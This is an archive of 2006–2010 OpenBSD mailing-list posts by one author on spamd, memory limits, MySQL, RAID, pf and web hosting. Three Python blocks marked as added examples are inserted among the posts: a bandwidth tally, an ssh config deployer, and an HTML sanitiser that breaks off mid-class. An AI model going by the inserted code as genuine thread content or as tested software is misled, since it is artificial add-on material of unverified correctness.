Re: help
On 8 Nov 2010, at 11:33, Joe Warren-Meeks wrote:

> On 8 November 2010 10:46, steve st...@crs.com wrote:
>
> > help
>
> I need somebody.

help...

--
When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers.
http://playr.co.uk/
Spamd traplist.gz
Are there any problems at the moment with the spamd data files that are hosted in various locations? I'm getting lots of FTP errors:

On 12 Aug 2010, at 16:01, Cron Daemon wrote:

> ftp: connect: Connection timed out
> ftp: connect: Connection timed out
> ftp: connect: Connection timed out
> ftp: connect: Connection timed out

From machines at various sites, pointing to an error somewhere with the master servers. Running spamd-setup in debug mode:

# /usr/libexec/spamd-setup -d
Getting http://www.openbsd.org/spamd/traplist.gz
ftp: connect: Connection timed out
blacklist uatraps 0 entries
Getting http://www.openbsd.org/spamd/nixspam.gz
ftp: connect: Connection timed out
blacklist nixspam 0 entries
Getting http://www.openbsd.org/spamd/chinacidr.txt.gz
...

So something somewhere is amiss. A firewall upgrade that blocked ports 20/21 in error perhaps?

G.

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: OpenBSD mascotte
On 25 Jul 2010, at 21:54, Christian Weisgerber wrote:

> (I'm sure if somebody WANTED to, more of them could be made. Somebody would have to talk to Steiner, find out if they still have the patterns on file, if not give them an old plushie as a template, maybe go through a few prototypes, front a few thousand euros for a hundred-unit or so production run, and then figure out how to sell them.)

If you just wanted a handful then you might be able to find somebody here who would make them: http://etsy.com/

G.

--
Sent from my email program on my computer sitting on my desk in my house.
http://playr.co.uk/
New Installer: Thank you
It's been a while since I've upgraded a box (or ran the installer for that matter) and this was the first time I used the bsd.rd kernel to do it. I'd like to give a massive thank you to all the developers who have worked on the new installer and upgrade documentation; it made upgrading a 4.4 machine to 4.7 a piece of cake. It's a really smooth process, you can see where the effort has been spent.

Excellent work guys, keep it up :)

Gaby.

--
I'm on a horse!
http://playr.co.uk/
Re: How to make FTP work from the firewall system?
On 16 Mar 2010, at 17:24, Dave Anderson wrote:

> I'm configuring a notebook which will use PF to protect itself from the environments in which I use it, and would like to have FTP 'just work' on it -- whether it's from an explicit FTP command, from a browser, or embedded in some other program or script.

Not really been following this thread, but is there any problem with using SFTP? It's implemented in many FTP programs and only requires port 22 open on the firewall.

G.

--
Expounding the theory of infinite Abelian Badgers
http://playr.co.uk/
Re: Apache - bandwidth usage limit per vhost
On 9 Mar 2010, at 17:42, Ozgur Kazancci wrote:

> I'd like to set a (monthly) bandwidth quota limit to my Apache virtualhosts. For instance, domain.com would have an amount of 10G/Month bandwidth limit (and in case of exceeding the limit, it'd get redirected to a Bandwidth limit exceeded alert page.)

I too would be very interested in something that works with the stock Apache in 4.6.

Gaby.

--
Imagine there were no hypothetical situations.
http://playr.co.uk/
Re: Apache - bandwidth usage limit per vhost
On 9 Mar 2010, at 17:42, Ozgur Kazancci wrote:

> Apache doesn't come with such a feature. I tried mod_cband. It was quite unstable, has too many bugs, issues. (Dozens of unfixed security issues, bugs for a few years: http://sourceforge.net/tracker/?group_id=154335&atid=791368 ), there is no more development for that module and it is abandoned by its developer. I tried some other modules such as mod_bandwidth, mod_curb, mod_bw, but no luck. Pretty old and 'expired' modules.

Thinking about this a little more, you could perhaps create a LogFormat string that dumped the hostname, bytes in and out to a logfile somewhere. This could then be parsed every 5 minutes or so by a cron job, stats tabulated and Apache configs adjusted accordingly.

You could then perhaps have a RewriteRule and use a RewriteMap to match specific hostnames that need redirecting to the bandwidth reached page. When a host hits its bandwidth limit then an entry is created in the map and that site gets redirected to the holding page.

Just a vague idea, probably full of holes, but it could be a step in the right direction.

G.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
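The log-then-RewriteMap idea above, worked through as an added example (this is not code from the thread). The LogFormat, the map path, the quotas and the sample log lines are all assumptions constructed for the example; it covers the whole loop the post sketches: tally, compare against quota, rewrite the map.

```python
"""Monthly per-vhost bandwidth tally from an Apache access log, written out
as a mod_rewrite txt: map of the vhosts that are over quota.  Added example,
not code from the thread.  Assumed Apache config (constructed for this
example; %v and %b exist in Apache 1.3, %b counts response body bytes only):

    LogFormat "%v %t %b" vhostbytes
    CustomLog /var/www/logs/vhostbytes_log vhostbytes
    RewriteEngine On
    RewriteMap overquota txt:/var/www/conf/overquota.map
    RewriteCond ${overquota:%{SERVER_NAME}} ^1$
    RewriteRule !^/quota-exceeded\\.html$ /quota-exceeded.html [R=302,L]

mod_rewrite re-reads a txt: map when its mtime changes, so the cron job only
has to replace the file; no restart is needed."""
import os
import re
import sys
import tempfile
from collections import defaultdict

LINE_RE = re.compile(
    r"^(?P<vhost>[\w.-]+) \[\d{2}/(?P<mon>[A-Z][a-z]{2})/(?P<year>\d{4}):[^\]]*\] "
    r"(?P<bytes>\d+|-)$"
)
MONTHS = {m: i for i, m in enumerate(
    "Jan Feb Mar Apr May Jun Jul Aug Sep Oct Nov Dec".split(), 1)}

# Monthly quotas in bytes; constructed for the example (10 GiB and 1 GiB).
QUOTAS = {"domain.com": 10 * 1024 ** 3, "other.org": 1 * 1024 ** 3}

# Constructed sample log in the assumed format.  The malformed last line must
# be skipped rather than crash the cron job.
SAMPLE_LOG = """\
domain.com [09/Mar/2010:17:42:01 +0000] 4096
other.org [09/Mar/2010:17:42:05 +0000] 2048
other.org [09/Mar/2010:17:42:06 +0000] -
domain.com [09/Mar/2010:17:43:10 +0000] 6442450944
domain.com [10/Mar/2010:01:00:00 +0000] 5368709120
other.org [10/Feb/2010:01:00:00 +0000] 2147483648
this line is not in the expected format
"""


def tally(log_text):
    """Sum bytes per (vhost, 'YYYY-MM').  Apache logs '-' in %b for zero."""
    totals = defaultdict(int)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        month = "%s-%02d" % (m.group("year"), MONTHS[m.group("mon")])
        sent = 0 if m.group("bytes") == "-" else int(m.group("bytes"))
        totals[(m.group("vhost"), month)] += sent
    return dict(totals)


def over_quota(totals, quotas, month):
    """Vhosts whose total for `month` exceeds their quota, sorted by name."""
    return sorted(
        vhost for (vhost, mon), used in totals.items()
        if mon == month and vhost in quotas and used > quotas[vhost]
    )


def render_map(vhosts):
    """Body of a txt: RewriteMap: one 'key value' pair per line."""
    return "".join("%s 1\n" % v for v in vhosts)


def write_map(path, body):
    """Replace the map atomically so Apache never reads a half-written file;
    0644 because the server's children, not root, open the map."""
    fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".")
    with os.fdopen(fd, "w") as f:
        f.write(body)
    os.chmod(tmp, 0o644)
    os.replace(tmp, path)


if __name__ == "__main__":
    # Usage from cron: tally.py YYYY-MM /var/www/conf/overquota.map < vhostbytes_log
    month, path = sys.argv[1], sys.argv[2]
    write_map(path, render_map(over_quota(tally(sys.stdin.read()), QUOTAS, month)))
```

Because a txt: map is looked up per request, an emptied map (next month, or after the quota is raised) takes effect without touching the running server.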
Re: Joomla - MySQL Problem: Could not connect to MySQL
On 8 Mar 2010, at 21:07, Jan wrote:

> Unable to connect to the database: Could not connect to MySQL

Check that your code is connecting to 127.0.0.1 instead of localhost? Usually fixes it for me, and you don't need to worry about messing around with sockets.

G.

--
Brought to you by the Department of Redundancy Department's Recursion Division of Recursion
http://playr.co.uk/
Re: route default
On 7 Feb 2010, at 17:50, Bret S. Lambert wrote:

> On Sun, Feb 07, 2010 at 06:29:27PM +0100, Jean-Francois wrote:
>
> > Hello,
> > Since some time, I need to add a default route with route add default 192.168.1.1 in order to be able to reach the internet, otherwise I get (no route to host). I would like to automate this in a proper way, as it should be.
>
> If you're pulling from dhcp, that should be populated automatically. But if you just need to set it for a system with a static IP, ``man mygate'' will show you what you need to do.

This should have been automatically configured when you did the initial installation. What did you skip in there?

G.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Backplanes
Does anybody have any good/bad experiences using any of the IcyBox SATA backplanes? They're not explicitly listed in /i386.html and I'm looking to use one with an LSI MegaRaid card in RAID5 mode. Some have one port per drive, some have two ports for all 5 drives; I guess I want the one port per drive model, but having not used a backplane before I'd love to hear any tips and advice on offer.

Thanks,

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: Backplanes
On 4 Oct 2009, at 17:11, Marco Peereboom wrote:

> Don't use dual port on SATA unless you have some sort of interposer (little device between the drive and the backplane) that unfucks the SATA protocol.

The current setup is a 4 channel SATA RAID card directly connected to each of the four drives. I suppose all I really need is just a set of removable caddies; perhaps a dedicated backplane is overkill.

G.

--
Expounding the theory of infinite Abelian Badgers
http://playr.co.uk/
AMD64 with 4GB RAM
Does anybody know the status of large memory support in 4.5/amd64? I found this about 4.4 not finding the full 4GB:

http://kerneltrap.org/mailarchive/openbsd-misc/2008/12/15/4420904

And this about bigmem causing boot failure:

http://kerneltrap.org/index.php?q=mailarchive/openbsd-misc/2008/10/8/3555614/thread

And I've looked at the changelog between 4.4 and 4.5 for any memory related changes. I have a machine with 4GB RAM and a quad core Xeon processor. Will it be able to see the full 4GB of RAM or will I have to tweak bigmem, either by building a custom kernel (really don't want to do that) or by using config()?

Gaby.

--
Uganda Maximum - Enemy of the English Thrust
http://www.playr.co.uk/
Re: AMD64 with 4GB RAM
On 22 Jun 2009, at 14:58, Thomas Pfaff wrote:

> On Mon, 22 Jun 2009 12:37:08 +0100 Gaby Vanhegan g...@vanhegan.net wrote:
>
> > I have a machine with 4GB RAM and a quad core Xeon processor. Will it be able to see the full 4GB of RAM or will I have to tweak bigmem, either by building a custom kernel (really don't want to do that) or by using config()?
>
> You can't use config to toggle bigmem. You need to set the bigmem variable to 1 in /usr/src/sys/arch/amd64/amd64/machdep.c, then you compile and install a new kernel. http://www.openbsd.org/faq/faq5.html#BldKernel explains how.

I'd gathered that from reading one of those threads to the end. I really wanted to avoid having to build a custom kernel, especially if the results might not even work. I suppose I was just inquiring about the status of bigmem in 4.5 and if it is considered safe to use yet?

G.

--
Sent from my email program on my computer sitting on my desk in my house.
http://playr.co.uk/
amd64 on Xeon X3220
I've been googling around for any information about OpenBSD on this hardware. I want to get up and running in 64bit mode, but the only thread I've found about this chip in a Dell R200 server was about having problems with a 4.1 install.

Am I likely to hit any problems installing 4.5 on a Xeon X3220 in a Dell R200 server? I'm about to commission a server to test this out, but if anybody has any pointers then I'd love to hear them :)

Gaby.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 12:42, Toni Mueller wrote:

> > I've been googling around for any information about OpenBSD on this hardware.
>
> hmmm I can only tell you that it works on an X3230 (Supermicro, though). The machine has been working for me for a few months now. Getting a test machine that you can keep if it turns out to work is always recommended, imho.

Are you running it in 64bit mode?

G.

--
Imagine there were no hypothetical situations.
http://playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 14:19, Marco Peereboom wrote:

> Works fine. Theo uses a pair as bgp boxes.

Are they used in 64bit mode?

G.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Re: amd64 on Xeon X3220
On 16 Jun 2009, at 14:30, Gaby Vanhegan wrote:

> On 16 Jun 2009, at 14:19, Marco Peereboom wrote:
>
> > Works fine. Theo uses a pair as bgp boxes.
>
> Are they used in 64bit mode?

Of course I realise now the complete and utter stupidity of this question. Please ignore.

(And how much is this free weekend?)

G.

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: MySQL and ulimit
On 9 Jun 2009, at 22:43, Daniel Ouellet wrote:

> If I may ask, why would you really want to get a 2GB buffer?

The app generates a lot of database traffic, as well as doing some fairly large transactional queries, hence the need for InnoDB. MySQL queries keep failing with lack of memory errors:

090609 17:23:42 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 1048548 bytes)
090609 17:25:10 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes)
090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes)
090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260160 bytes)
090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260208 bytes)
090609 17:25:11 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 1048548 bytes)
090609 17:25:23 [ERROR] /usr/local/libexec/mysqld: Out of memory (Needed 260464 bytes)

And bouncing the MySQL server seems to bring it back to life. If I can't change the hard limits on the OS, is there something I can do to MySQL to make it happier?

G.

--
Brought to you by the Department of Redundancy Department's Recursion Division of Recursion
http://playr.co.uk/
MySQL and ulimit
I'm having an annoying time trying to make MySQL run with a large amount of buffer memory. I have 4Gb of RAM and 8Gb of swap and I need to increase the data size limit for the _mysql login class. Currently it's set to unlimited but it doesn't seem to be coming through to the _mysql login class:

$ ulimit -a
time(cpu-seconds)    unlimited
file(blocks)         unlimited
coredump(blocks)     unlimited
data(kbytes)         1048576
stack(kbytes)        8192
lockedmem(kbytes)    1101134
memory(kbytes)       3301268
nofiles(descriptors) 2048
processes            1310
$ whoami
_mysql

I need to increase the data limit as we're hitting the limits with the large InnoDB pool size. I must be doing something wrong but I can't see the obvious problem that I'm hitting. Help?

I have a large InnoDB buffer pool configured and every time I fire up MySQL I keep getting this error:

# Starting mysqld daemon with databases from /var/mysql
090609 21:23:51  mysqld started
090609 21:23:51  InnoDB: Error: cannot allocate 1073758208 bytes of
InnoDB: memory with malloc! Total allocated memory
InnoDB: by InnoDB 14810216 bytes. Operating system errno: 12
InnoDB: Check if you should increase the swap file or
InnoDB: ulimits of your operating system.
InnoDB: On FreeBSD check you have compiled the OS with
InnoDB: a big enough maximum process size.
InnoDB: Note that in most 32-bit computers the process
InnoDB: memory space is limited to 2 GB or 4 GB.
InnoDB: We keep retrying the allocation for 60 seconds...

MySQL comes up but the innodb tables don't. This is the latest 4.5 release, upgraded yesterday, running the latest package of MySQL.

Haylp!

G.

--
Imagine there were no hypothetical situations.
http://playr.co.uk/
Re: MySQL and ulimit
Thanks for getting back to me so swiftly, I've been banging my head against this for a couple of days now... :(

On 9 Jun 2009, at 22:06, Daniel Ouellet wrote:

> Gaby Vanhegan wrote:
>
> > I'm having an annoying time trying to make MySQL run with a large amount of buffer memory. I have 4Gb of RAM and 8Gb of swap and I need to increase the data size limit for the _mysql login class. Currently it's set to unlimited but it doesn't seem to be coming through to the _mysql login class:
>
> How do you start your MySQL, do you actually tell it to use that class?

The server is started thusly:

sudo -c _mysql /usr/local/bin/mysqld_safe

And also:

# getcap -c datasize -f /etc/login.conf _mysql
=infinity
# getcap -c datasize-max -f /etc/login.conf _mysql
=2048M
# getcap -c datasize-cur -f /etc/login.conf _mysql
=2048M

On 9 Jun 2009, at 22:07, Ted Unangst wrote:

> There are hard limits that you can't exceed.

If the machine has more than enough physical RAM and tons of swap, is there no way to configure MySQL to hold a 2Gb buffer in memory? I really want to avoid building a custom kernel and it feels like I should be able to get this working using login.conf, ulimit and sysctl settings. Or is this a wall that is not meant to be broken through?

G.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Crash diagnosis
I have a machine that is running 4.3 bsd.mp, MySQL and one single site of PHP scripts, which keeps crashing. The frustrating thing is that it doesn't panic the kernel, so I can't get any DDB output; the machine just locks up. Looking at it over the KVM it just shows the login prompt with the cursor flashing but not responding.

Where do I go from here? How can I debug a problem that has no symptoms other than the system silently locking up? I'd love to provide more information but there's nothing to give. We've swapped out the entire machine, tried the UP and MP kernels, but no joy. The plan is to upgrade it to 4.5 and see if the problems persist. Failing that we're looking at a clean install on a brand new machine, but I'd like to avoid that if possible.

Any suggestions about how I can try and figure out what's killing it?

Many thanks,

G.

dmesg follows:
Re: Crash diagnosis
On 8 Jun 2009, at 16:46, Josh Grosse wrote:

> On Mon, 8 Jun 2009 15:56:48 +0100, Gaby Vanhegan wrote
>
> > Any suggestions about how I can try and figure out what's killing it?
>
> If sysctl ddb.console=1, and the OS is still accepting interrupts from the console, then a CTRL-ALT-Esc or Break will force the kernel to ddb.

I've added that into sysctl.conf so we'll just have to wait and see what happens next time. Thanks for the pointer though, it may provide some more insight.

G.

--
When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers.
http://playr.co.uk/
Re:
On 27 May 2009, at 16:54, Bob Beck Via Secure Email wrote:

> Hi this is bob. really. I can haz Ur Passwordz plz?

Yes, my passwords are: god, sex and please.

> ohai, and Ur bank accountz and sinz too?

Account no. 7337h4x0r5, my SIN is one of omission.

I'm trusting you with these so don't do anything stupid like post them on a mailing list or something.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Re:
On 27 May 2009, at 17:38, bofh wrote:

> On a post it in her drawer (and no, I will not be drawn into a discussion of the possible meanings of drawer in the .us vs .uk versions).

<benny-hill>
Something about rifling through her drawers
</benny-hill>

--
When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers.
http://playr.co.uk/
Re: Is Jesus God
On 11 May 2009, at 22:40, Marco Peereboom wrote:

> On Mon, May 11, 2009 at 03:24:15PM -0500, James wrote:
>
> > !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional//EN HTMLHEAD META http-equiv=Content-Type content=text/html; charset=unicode META content=MSHTML 6.00.6001.18226 name=GENERATOR/HEAD BODY PHere is your Topic of the Month. Please log in at A href=http://www.jesus4athiest.org;www.jesus4athiest.org/A/P PTopic: nbsp;Is Jesus God/P Ppeace-james/P/BODY/HTML
>
> no

But at least he uses a DOCTYPE tag.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Re: I can't modify the main menu in gnome
On 7 Apr 2009, at 20:32, Jose P.G wrote:

> Hi, I am logged in as root and when I try to enable Internet, games... and I press close it doesn't work, it stays inactive. Could somebody help me? I don't understand why this is happening.

And:

> Hi, I have installed openbsd 4.4 with gnome and I don't know what package I have to install to mount HDDs or usbs. Could somebody help me?

Try this:

http://openbsd.org/faq/

This will serve you very well.

G.

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: About the OS - The basics
On 4 Apr 2009, at 21:01, Manuel Carrasco wrote:

> I don't know too much, so I am here, asking if somebody can help me with the basics.

Try this:

http://openbsd.org/faq/

This will serve you very well.

--
When I die I want to go peacefully in my sleep like my Grandfather, not screaming in terror like his passengers.
http://playr.co.uk/
Re: OT, .. but eCommerce?
On 12 Dec 2008, at 17:10, Michiel van der Kraats wrote:

> oscommerce works but is a mixed bag.

I've heard similar things about osCommerce. I have been recommended this:

http://www.shopify.com/

If you can let go of the hosting then it looks rather sweet.

G.

--
Imagine there were no hypothetical situations.
http://playr.co.uk/
Re: RAID Hot Spare
On 18 Jun 2008, at 16:51, Marco Peereboom wrote:

> As far as I know I fixed the hot-spare thing on ami. If that is not the case let me know.

I booted into the card's BIOS and confirmed that the drive was marked as hot spare. It seems to have worked, and this is on 4.1 as well.

Thanks!

Gaby.

--
Uganda Maximum - Enemy of the English Thrust
http://www.playr.co.uk/
RAID Hot Spare
We had a drive failure on a RAID5 (LSI MegaRaid SATA 150-4) volume in our server (OpenBSD 4.1/x86). The hot spare kicked in and the volume rebuilt fine after a successful fsck in single user mode. We put in a new drive as the new hot spare:

# bioctl -Div ami0
bioctl: cookie = 0xd2a23c10
bio_inq
bio_inq { 0xd2a23c10, ami0, 2, 4 }
Volume  Status     Size           Device
 ami0 0 Online     501991079936   sd0     RAID5
        0 Online   250995539968   0:0.0   noencl <Maxtor 6V250F0 VA11 'V594LE9G'>
        1 Online   250995539968   0:1.0   noencl <Maxtor 6V250F0 VA11 'V5075JVG'>
        2 Online   250995539968   0:3.0   noencl <Maxtor 6V250F0 VA11 'V5064EEG'>
 ami0 1 Hot spare  250053918720   0:2.0   noencl <WDC WD2500AAKS-00VSA01.0 'WD-WMART1158126'>
#

The thing is the hot spare is fractionally smaller than the other drives, which is what happens when you go into a shop and ask for a 250G drive. What's going to happen if another drive fails and the RAID array tries to rebuild onto the slightly smaller hot spare? Will it explode or just error out? Do we need to go back and put a slightly larger drive in?

I know this isn't the ideal place to ask the question, but I figure we can't be the only people running LSI cards under OpenBSD. So far I can't find any good references on the 'net, but my logic and intuition tell me that the drive needs to be bigger...

G.

--
Being drunk is feeling sophisticated without being able to say it.
http://www.playr.co.uk/
Re: n2k8 network hackathon
On 8 May 2008, at 20:24, Theo de Raadt wrote:

> Perhaps some who watch the commit logs have already figured out that most of the network developers are currently involved in a week-long network hackathon in Japan. A bit more information about this can be found at http://openbsd.org/hackathons.html#n2k8

Any pictures of the festivities online?

Gaby.

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: man ftp site is very slow
On 7 Mar 2008, at 11:49, arthur wrote:

> I am loading cd43.iso from ftp.openbsd.org and it is 4.2k/s. Anything wrong, or just too busy? Loading from FBSD is 146k/s so it is not a problem with my internet.

You could try using a more local mirror?

http://www.openbsd.org/ftp.html

Gaby.

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
femail/chroot
Hi,

I'm struggling to make femail work in the Apache chroot. I made mini_sendmail work from ports, but this isn't ideal as it requires sh inside the chroot, so I've done away with that idea. femail is the suggested alternative but I have had no success in making it work.

I have compiled the 0.97 version from source; that works fine. I can send mail from the command line fine. I have set up a very basic femail.conf and put it in /etc/femail.conf, as well as /var/www/etc/femail.conf.

Both femail and mini_sendmail work fine on the command line; mini_sendmail works fine in apache, femail does not. The only error output I see is in /var/www/logs/error_log, which is the line Abort Trap. In order to get this, I still have to have sh inside the chroot. Is femail going to need this too?

Has anybody had any success setting up femail inside the apache chroot?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
Re: communism is good
On 5 Sep 2007, at 18:13, Nick Guenther wrote:

> On 9/5/07, Josef Stalin [EMAIL PROTECTED] wrote:
>
> > communism is good, openbsd comrades. it is very nice.
>
> Party on.

In communist russia, OpenBSD develops you!

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/
inet6 buffer overflow
Hi,

Reading the security advisory for the ipv6 buffer issue, the workaround is to block inet6 traffic in pf.conf. My default block line is actually:

block in on $ext_if

Where $ext_if is the net connection (the only network connection the machine is plugged into). Is the rule:

block in inet6

Redundant in this case, or should it still be added?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: A PHP management interface for OpenBSD ?
On 25 Jan 2007, at 03:52, Darren Spruell wrote:

> On 1/24/07, chefren [EMAIL PROTECTED] wrote:
>
> > On 1/25/07 1:34 AM, Passeur wrote:
> >
> > > We are in the process of developing a PHP framework with a web frontend to manage the OpenBSD settings through a web browser. A friend advised me not to do that because of all the security holes I will introduce on OpenBSD. He advised me to use CGI/Perl rather than PHP. What is your opinion?
>
> There's a perfectly good remote management interface for OpenBSD. sshd(8).

If you really have to use php, a framework suggested to me by a fellow tech at a company that I used to work for seemed sane.

1. Use PHP to manage a configuration on a totally separate box (the config box).
2. Use ssh to roll that configuration out to the live box, from the config box.

This way you're not opening up your entire system to php vulns; the machine that does the configuration should be securely locked away, inaccessible from the outside world, and you're administering the machine in a secure manner. Use ssh keyed authentication to remove the need for passwords and you're away.

You can even make the config box manage many configurations: just store the configuration in a database, dynamically create any configuration files on the config box and scp them over to the live box.

Thoughts?

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
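The config-box pattern described in the reply above, as an added example (not code from the thread or from any project). The sqlite table, the pf.conf layout, the key path and the remote paths are assumptions made up for the example; pfctl -n (parse only) and -f (load) are real flags.

```python
"""The config-box pattern: settings live in a database on a separate,
locked-down host; the live box's config is generated from them, pushed over
ssh with a dedicated key, syntax-checked on the live box, and only then
loaded.  Added example, not code from the thread or from any project.
Assumed (made up for the example): the sqlite schema, the pf.conf layout,
the key path and the remote paths."""
import re
import sqlite3
import subprocess

IDENTITY = "/home/deploy/.ssh/id_livebox"   # assumed: a key used for nothing else
SSH_OPTS = ["-i", IDENTITY, "-o", "BatchMode=yes", "-o", "StrictHostKeyChecking=yes"]

# Constructed settings, as they might sit in the config box's database.
SEED = [("ext_if", "em0"), ("web_ports", "80,443"), ("admin_net", "192.0.2.0/24")]


def seeded_db():
    """In-memory stand-in for the config box's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE settings (name TEXT PRIMARY KEY, value TEXT)")
    conn.executemany("INSERT INTO settings VALUES (?, ?)", SEED)
    return conn


def load_settings(conn):
    return dict(conn.execute("SELECT name, value FROM settings"))


def render_pf_conf(s):
    """Generate pf.conf.  Every value is checked against a strict pattern
    before interpolation, so a bad or tampered row in the database cannot
    smuggle extra rules into the file."""
    if not re.fullmatch(r"[a-z]+\d+", s["ext_if"]):
        raise ValueError("bad interface name: %r" % s["ext_if"])
    ports = [int(p) for p in s["web_ports"].split(",")]
    if not all(0 < p < 65536 for p in ports):
        raise ValueError("bad port list: %r" % s["web_ports"])
    if not re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}/\d{1,2}", s["admin_net"]):
        raise ValueError("bad admin network: %r" % s["admin_net"])
    return "\n".join([
        'ext_if = "%s"' % s["ext_if"],
        "set skip on lo0",
        "block in on $ext_if",
        "pass out on $ext_if keep state",
        "pass in on $ext_if proto tcp to ($ext_if) port { %s }"
        % ", ".join(str(p) for p in ports),
        "pass in on $ext_if proto tcp from %s to ($ext_if) port 22" % s["admin_net"],
    ]) + "\n"


def deploy_commands(host, user, local_file):
    """The remote steps as argv lists: stage the file, check it with
    pfctl -n, then load it.  Returned rather than run so they can be
    inspected without a live box."""
    target = "%s@%s" % (user, host)
    return [
        ["scp"] + SSH_OPTS + [local_file, "%s:/etc/pf.conf.new" % target],
        ["ssh"] + SSH_OPTS + [target, "sudo pfctl -nf /etc/pf.conf.new"],
        ["ssh"] + SSH_OPTS + [target,
         "sudo pfctl -f /etc/pf.conf.new && sudo cp /etc/pf.conf.new /etc/pf.conf"],
    ]


def deploy(host, user, local_file, run=subprocess.run):
    """Run the steps in order and stop at the first failure, so a file that
    fails the syntax check is never loaded."""
    for argv in deploy_commands(host, user, local_file):
        if run(argv).returncode != 0:
            return False
    return True


if __name__ == "__main__":
    with open("pf.conf.generated", "w") as f:
        f.write(render_pf_conf(load_settings(seeded_db())))
    ok = deploy("live.example.net", "deploy", "pf.conf.generated")
    print("loaded" if ok else "stopped: check or copy failed")
```

On the live box the key should belong to a dedicated account whose sudoers entry permits only the pfctl and cp commands above, so a compromise of the config box yields no more than the ability to push a syntactically valid pf.conf.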
Re: Secure perl forum board software
On 21 Jan 2007, at 17:58, bofh wrote:

> And along those lines, some simple photo album type thingy? SWMBO wants to put something up for family members to see, and I prefer not to use one of those big commercial things.

<shameless plug>
http://vanhegan.net/software/microalbum/
</shameless plug>

Disclaimer: I am the author of the software.

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
Re: OT: TinyMCE security and track records
On 21 Dec 2006, at 20:02, Daniel Ouellet wrote:

> Any valid feedback on the security and stability of this one on OpenBSD, or any other you prefer? I am looking more for security and stability as opposed to bells and whistles and features.

I was under the impression that TinyMCE, and other htmlarea based WYSIWYG editors, are all a huge mass of client side javascript, and therefore don't really pose a security issue to the server that hosts them. It essentially just replaces a textarea, and the value returned by the form may contain some HTML as a result. Just make sure that you sanitise and validate the data posted by the form (remove JavaScript, unwanted HTML tags, etc, the usual stuff).

Gaby

--
Junkets for bunterish lickspittles since 1998!
http://www.playr.co.uk/sudoku/
http://weblog.vanhegan.net/
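The server-side sanitising the reply above calls for, as an added example (not TinyMCE's code and not from the thread): an allowlist filter over the HTML a WYSIWYG editor posts back. The allowed tag and attribute sets are assumptions chosen for the example; it also handles the two cases a naive tag-stripper misses, script bodies and javascript: links disguised with entities or control characters.

```python
"""Allowlist sanitiser for HTML posted back from a browser-side WYSIWYG
editor (TinyMCE and friends).  Added example, not TinyMCE's or the thread's
code.  The allowed tags and attributes are assumptions made for the example."""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a", "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}}
URL_ATTRS = {"href"}
SAFE_SCHEMES = {"", "http", "https", "mailto"}   # "" = relative URL
VOID_TAGS = {"br"}
DROP_WITH_CONTENT = {"script", "style"}          # the tag and everything inside it go


def safe_url(value):
    """Return the URL if its scheme is allowed, else None.  ASCII control
    characters and whitespace are stripped first: browsers ignore them inside
    a URL, so 'java\\tscript:' would otherwise pass a naive scheme check."""
    cleaned = re.sub(r"[\x00-\x20\x7f]", "", value)
    if urlsplit(cleaned).scheme.lower() in SAFE_SCHEMES:
        return cleaned
    return None


class Sanitiser(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities arrive decoded
        self.out = []
        self.open_tags = []     # allowed tags still open, to emit balanced output
        self.drop_depth = 0     # > 0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.drop_depth += 1
            return
        if self.drop_depth or tag not in ALLOWED_TAGS:
            return              # unknown tag is unwrapped: its text survives, it does not
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()) or value is None:
                continue        # this is what removes onclick=, style=, etc.
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)          # <br/> becomes <br>
        if tag in DROP_WITH_CONTENT:
            self.handle_endtag(tag)               # <script/> has no body to drop

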